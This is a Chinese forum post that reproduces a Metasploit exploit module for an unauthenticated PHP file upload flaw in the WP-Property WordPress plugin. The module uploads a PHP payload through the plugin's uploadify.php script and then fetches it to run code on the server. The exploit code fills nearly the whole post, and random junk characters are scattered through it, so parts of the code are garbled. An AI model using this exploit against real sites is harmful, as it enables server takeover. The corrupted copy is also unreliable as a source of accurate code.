WordPress WP-Property PHP 文件上传漏洞
3 O2 M/ o1 B L( R$ i6 D* Y3 r0 w% @- ^6 w r6 J& P
## # This file is part of the Metasploit Framework and may be subject to
) t/ b; W1 g" W) i% u6 q8 {, g% _3 `, \
# redistribution and commercial restrictions. Please see the Metasploit
* J: l0 x5 k- L, N0 a! b1 m9 d
/ z( u( y! N5 x' p7 a8 V6 j# Framework web site for more information on licensing and terms of use.
8 f8 z; U: d# R
4 D' T/ n5 Z% m3 }# http://metasploit.com/framework/ ##
& r5 c! L2 t: w0 o3 s+ r0 G3 W# d- u; r' b$ n( ]! u% z
3 X' v0 \* [ |7 V7 `: R
0 M3 r/ z& z6 H3 f 6 C: }1 i9 v; u: E
2 V/ ]9 H1 G" I" H
require 'msf/core'* O7 A4 @- E. U% o
require 'msf/core/exploit/php_exe'
7 X& B+ E ~* u$ j7 S: Z
1 j1 y4 b- l& Mclass Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit: hpEXE def initialize(info = {}) super(update_info(info, 'Name' => 'WordPress WP-Property PHP File Upload Vulnerability',
5 y1 l+ F) q" \# C'Description' => %q{( t! k u/ A( z5 y0 U/ I
This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress plugin. By abusing the uploadify.php file, a malicious user can upload a file to a temp directory without authentication, which results in arbitrary code execution. }, 'Author' =>
& V a3 M! a/ i( r[$ l. H5 F8 p0 S! @1 W. h# u# ^
'Sammy FORGIT', # initial discovery
/ V3 p( G& b+ X7 ]+ l7 E4 \'James Fitts <fitts.james[at]gmail.com>' # metasploit module
j/ P( y, d' k/ ~5 M],2 v( i& f- v- g. v" R, o2 |# N
'License' => MSF_LICENSE,
8 {* {5 R. \0 N" q'References' =>8 n& v o o; [: O R3 F& |# u' I
[
$ H+ F! j# f$ M6 J$ Z8 s[ 'OSVDB', '82656' ],
' v7 y8 r* a9 ]* b! ~[ 'BID', '53787' ],' Z) G; f% e& ~8 z. d
[ 'EDB', '18987'],* a' g0 [- x2 G9 h9 j$ p: S
[ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]6 i# u5 G7 S# U3 n; B2 T
],. O5 M' N. D, M. f3 U9 I
'Payload' =>, X$ m" T1 c* f/ Q
{
% c$ u+ f% U- W5 p# o+ Z) ?1 {'BadChars' => "\x00",
" m, R9 v) t3 }! N, R},1 }4 u4 C; Q$ M! p/ l: `- T
'Platform' => 'php',5 X6 w: l; H+ C2 G( W/ Z$ Q
'Arch' => ARCH_PHP,
2 X* H# \0 ~* c0 b+ H! ~'Targets' =>
8 f9 t* T- ^$ B" U/ j[
) m8 ?: l. l1 I& `1 n8 G& }[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],/ h( o( `9 c( ^6 u& u+ W: S& A; I
[ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]: T. o, F" g& f
],
5 B4 D4 I* Z4 `& S. e3 W( @'DefaultTarget' => 0,
0 Y; r9 ^$ J, _: b Z; s& ?) V0 j* j'DisclosureDate' => 'Mar 26 2012'))8 `* y; T2 s o7 n8 C3 Z5 W6 B
3 J! I) E5 T! z9 _; mregister_options(
% ~0 n6 y, [5 V( B2 B# ~' |[
- Y- c' ]3 X8 f6 AOptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress']), q8 \' k" \. `6 ?" J
], self.class)7 Z5 F6 t& N* a& T0 v
end
) Z! z6 \+ O$ l/ ~; V8 a) f
0 x1 R3 i0 Y2 g) \6 U8 z! _def check x; d' B" x0 A$ ^2 m
uri = target_uri.path
! F- M5 T/ H/ f+ y$ n! I0 {uri << '/' if uri[-1,1] != '/' res = send_request_cgi({ 'method' => 'GET',
& K# G2 y/ F! w5 S! K& R'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
3 E3 w! {; X! |# q& u0 x U})
; x! `2 c& A# t7 Q* k$ K" n$ h- Y* g {
if not res or res.code != 200
1 C, w% Q$ p6 a) }/ a0 D" f8 ]return Exploit::CheckCode::Unknown3 j, f5 s! x5 p+ D2 F( _( [
end9 t+ y P1 x) K0 \1 t# U
6 U& u6 @) F& w
return Exploit::CheckCode::Appears
5 c- B% N5 z, o4 P2 C3 f% b! O6 r; Qend' S# ~" r. C6 A, [. Y* `
# _! H2 Y0 C; k$ i
def exploit( ]9 n) }0 i6 o8 k& E2 ^
uri = target_uri.path/ I: P- s' U, @% J3 V% g
uri << '/' if uri[-1,1] != '/' peer = "#{rhost}:#{rport}" @payload_name = "#{rand_text_alpha(5)}.php" php_payload = get_write_exec_payload(:unlink_self=>true)$ l# r, H" H. Z" {' @0 r9 b
; e, R% ~) T4 c! q/ t2 L+ mdata = Rex::MIME::Message.new
* o% B2 N6 w' f% W" Z" r( Ldata.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
8 C* S6 N% x4 r) R6 mdata.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
; Q, }* h; a5 e7 t' R+ Fpost_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')
$ E) s( G: Z/ P; G: x. v" t' Q3 W2 M1 k8 T! d% h
print_status("#{peer} - Uploading payload #{@payload_name}")) g- l/ H1 C: Y, w$ d) q
res = send_request_cgi({
7 ~" t ?# b! v4 ~% ^'method' => 'POST',
; k) c% e# k1 E'uri' => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",; L; w; a& Y+ {5 C J1 i/ Q$ x
'ctype' => "multipart/form-data; boundary=#{data.bound}",% ?& {( ]4 `5 ^2 A( S2 R
'data' => post_data
2 V; ?2 j h8 M" d$ g1 Q})
9 K) a* B6 M5 o& _! g/ I; [: w; ?' h6 ]7 l
if not res or res.code != 200 or res.body !~ /#{@payload_name}/
* }8 q* P. O; tfail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")* f' ]8 d" O; x1 L- A2 }9 X
end6 b0 b+ Q2 C! o; k. Q+ s+ Q
4 r, b2 h6 |, _ F) X( N8 w5 Wupload_uri = res.body2 @- N" k! R! J% U6 Z
# x, m' } u* s" @( v9 d
print_status("#{peer} - Executing payload #{@payload_name}")1 ?; @4 _6 C" N' A1 @3 F+ y
res = send_request_raw({
; ]4 B" i. e) j. x" N) Y0 q6 j+ O" j5 z'uri' => upload_uri,
7 u& [" d, f9 H9 ^8 q! w6 H'method' => 'GET'
0 e! {2 U t# ]3 i})
* g9 v9 S9 G5 O3 t! d/ Q9 Tend4 E' S2 Q" a% `, t# z, ^ {: o& {
end
+ W% X) J: d0 ^( `# P" S7 }/ M: k" L) J' {7 k# @3 M
不要问我这写的是什么 怎么利用 我是说msf.
' O L9 Y+ B7 Z4 M7 B6 Y5 t6 s8 n! Z, F
|
发表于 2013-1-4 19:51:30
收藏
支持
反对